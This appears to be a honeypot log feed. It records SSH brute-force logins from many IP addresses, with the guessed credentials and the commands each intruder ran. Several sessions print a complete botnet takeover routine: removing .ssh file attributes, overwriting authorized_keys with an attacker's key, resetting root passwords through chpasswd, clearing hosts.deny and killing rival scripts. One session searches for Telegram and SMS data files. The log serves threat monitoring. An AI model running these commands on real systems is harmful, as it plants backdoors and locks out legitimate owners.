🎭 spice_root_14 (103.160.153.158) β€” Delhi, India Β· 1 session Β· 1 cmd
2026-05-19 23:22 EDT Β· as root/Jimster2026$
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 liberty_root_34 (198.12.250.102) β€” Tempe, United States Β· 1 session Β· 1 cmd
2026-05-19 23:17 EDT Β· as root/#2026Jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 phantom_root_90 (183.182.105.73) β€” Vientiane, Laos Β· 1 session Β· 1 cmd
2026-05-19 23:16 EDT Β· as admin/12345678
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 fika_root_5 (80.217.106.60) β€” Stockholm, Sweden Β· 1 session Β· 1 cmd
2026-05-19 23:09 EDT Β· as root/Welcome@2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 pretzel_root_19 (165.227.175.106) β€” Frankfurt am Main, Germany Β· 1 session Β· 1 cmd
2026-05-19 23:00 EDT Β· as admin/Jimster!2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 rogue_root_96 (139.59.115.243) β€” Singapore, Singapore Β· 1 session Β· 1 cmd
2026-05-19 22:41 EDT Β· as root/$2026Jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 toucan_2 (69.6.251.124) β€” Vinhedo, Brazil Β· 1 session Β· 1 cmd
2026-05-19 22:29 EDT Β· as jimster/Jimster2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 bistro_root_11 (173.249.15.130) β€” Lauterbourg, France Β· 1 session Β· 1 cmd
2026-05-19 22:18 EDT Β· as admin/Welcome2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 phantom_root_91 (81.18.221.21) β€” Warsaw, Poland Β· 1 session Β· 1 cmd
2026-05-19 22:07 EDT Β· as jimster/Jimster!2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 k-pop_root_17 (1.234.27.159) β€” Gangnam-gu, South Korea Β· 1 session Β· 1 cmd
2026-05-19 22:03 EDT Β· as admin/Password@1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 cowboy_root_43 (162.240.156.176) β€” Phoenix, United States Β· 1 session Β· 1 cmd
2026-05-19 21:55 EDT Β· as root/Jimster2025!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 liberty_root_35 (185.111.156.245) β€” Orangeburg, United States Β· 1 session Β· 1 cmd
2026-05-19 21:52 EDT Β· as admin/Jimster123@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 phantom_root_92 (38.156.13.6) β€” BogotΓ‘, Colombia Β· 2 sessions Β· 2 cmds
2026-05-18 20:01 EDT Β· as jimster/Password123!, root/Jimster@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 hanbok_root_15 (218.157.205.238) β€” Yecheon-gun, South Korea Β· 2 sessions Β· 18 cmds
2026-05-10 03:15 EDT Β· as root/123, root/admin
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ /ip cloud print Γ—2
$ ifconfig Γ—2 // network mapping
$ uname -a Γ—2 // OS/kernel identification
$ cat /proc/cpuinfo Γ—2 // CPU profiling
$ ps | grep '[Mm]iner' Γ—2
$ ps -ef | grep '[Mm]iner' Γ—2
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/* Γ—2
$ locate D877F783D5D3EF8Cs Γ—2
$ echo Hi | cat -n Γ—2
🎭 bistro_root_12 (87.106.255.77) β€” Paris, France Β· 1 session Β· 1 cmd
2026-05-19 20:36 EDT Β· as root/p@ssword@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 seoul_root_19 (222.97.189.106) β€” Busan, South Korea Β· 1 session Β· 1 cmd
2026-05-19 20:33 EDT Β· as jimster/Jimster.2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 star_3 (167.71.171.30) β€” Clifton, United States Β· 1 session Β· 1 cmd
2026-05-19 20:16 EDT Β· as jimster/2025#Jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 abba_root_5 (185.157.223.17) β€” Falkenberg, Sweden Β· 1 session Β· 1 cmd
2026-05-19 20:16 EDT Β· as root/Admin123@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 lotus_root_14 (210.18.155.11) β€” Chennai, India Β· 1 session Β· 1 cmd
2026-05-19 20:15 EDT Β· as root/123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 maple_root_4 (141.109.168.109) β€” Calgary, Canada Β· 1 session Β· 20 cmds
2026-05-19 19:53 EDT Β· as kelvin/kelvin
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "kelvin\nHuj6qjUGQ5NV\nHuj6qjUGQ5NV"|passwd|bash
$ Enter new UNIX password:
$ echo "kelvin\nHuj6qjUGQ5NV\nHuj6qjUGQ5NV\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_97 (43.134.17.82) β€” Singapore, Singapore Β· 1 session Β· 1 cmd
2026-05-19 19:50 EDT Β· as jimster/Password123!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 yankee (43.173.66.49) β€” Santa Clara, United States Β· 1 session Β· 20 cmds
2026-05-19 19:49 EDT Β· as developer/dev
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "dev\ntm6nHgdABPmx\ntm6nHgdABPmx"|passwd|bash
$ Enter new UNIX password:
$ echo "dev\ntm6nHgdABPmx\ntm6nHgdABPmx\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 crepe_root_15 (31.220.80.85) β€” Lauterbourg, France Β· 1 session Β· 1 cmd
2026-05-19 19:38 EDT Β· as root/Jimster$123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 hanbok_root_16 (58.126.160.2) β€” Chuncheon, South Korea Β· 2 sessions Β· 38 cmds
2026-05-19 19:06 EDT Β· as root/100100, root/s1s2s3s4
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:yaWj4SuIusIP"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:znVAlnJAiciP"|chpasswd|bash
🎭 eagle_root_43 (192.169.136.182) β€” Tempe, United States Β· 1 session Β· 1 cmd
2026-05-19 19:30 EDT Β· as jimster/Passw0rd2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 eagle_root_44 (170.106.181.179) β€” Santa Clara, United States Β· 2 sessions Β· 38 cmds
2026-05-19 19:03 EDT Β· as root/@k0nig@2023, root/a111111
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:3PWiPnr35jNG"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:rY0Q8wVUgmND"|chpasswd|bash
🎭 toucan_root_2 (138.99.80.102) β€” Salvador, Brazil Β· 4 sessions Β· 76 cmds
2026-05-13 05:50 EDT Β· as root/@k0nig@2023, root/Pi123456, root/a111111
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo "root:DygfraWkQWdz"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—4 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:jQIV856oZ3se"|chpasswd|bash
$ echo "root:Golw209fQUZ3"|chpasswd|bash
$ echo "root:hqd6DUMoyWEf"|chpasswd|bash
🎭 ghost_root_99 (43.132.227.251) β€” Hong Kong, Hong Kong Β· 2 sessions Β· 38 cmds
2026-05-19 19:05 EDT Β· as root/@k0nig@2023, root/a111111
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:w8GdlJ7pr8kc"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:BYG4cbWBxUaE"|chpasswd|bash
🎭 cowboy_root_44 (23.254.226.240) β€” Seattle, United States Β· 2 sessions Β· 38 cmds
2026-05-19 19:01 EDT Β· as root/100100, root/s1s2s3s4
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:spodLxeYdLp0"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:shbH1c44AGq9"|chpasswd|bash
🎭 wraith_root_76 (124.156.194.248) β€” Singapore, Singapore Β· 2 sessions Β· 38 cmds
2026-05-19 19:06 EDT Β· as root/100100, root/s1s2s3s4
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:lwfxqiTJTR7n"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:gq0wy1iNJ3Mm"|chpasswd|bash
🎭 stein_2 (91.98.148.253) β€” Falkenstein, Germany Β· 1 session Β· 1 cmd
2026-05-19 19:12 EDT Β· as jimster/Jimster2026@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 cipher_root_76 (202.191.58.34) β€” Hanoi, Vietnam Β· 1 session Β· 1 cmd
2026-05-19 19:07 EDT Β· as admin/abc123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 cipher_root_77 (43.163.87.200) β€” Singapore, Singapore Β· 1 session Β· 19 cmds
2026-05-19 19:06 EDT Β· as root/a111111
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:T2j2bA3sTVz0"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 eagle_root_45 (108.174.145.6) β€” Jacksonville, United States Β· 1 session Β· 1 cmd
2026-05-19 19:04 EDT Β· as admin/admin123#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 panda_root_30 (115.190.74.101) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-05-19 18:56 EDT Β· as root/!@#123qwe
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:5jwa5ZINOqBZ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 liberty_root_36 (161.35.101.104) β€” North Bergen, United States Β· 1 session Β· 1 cmd
2026-05-19 18:53 EDT Β· as root/test@2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 rogue_root_98 (150.95.27.209) β€” Bangkok, Thailand Β· 1 session Β· 1 cmd
2026-05-19 18:43 EDT Β· as root/P@ssw0rd123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 ghost_root_100 (5.223.93.117) β€” Singapore, Singapore Β· 1 session Β· 1 cmd
2026-05-19 18:36 EDT Β· as root/passw0rd123@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 wraith_root_77 (103.127.207.14) β€” Phu Do, Vietnam Β· 1 session Β· 1 cmd
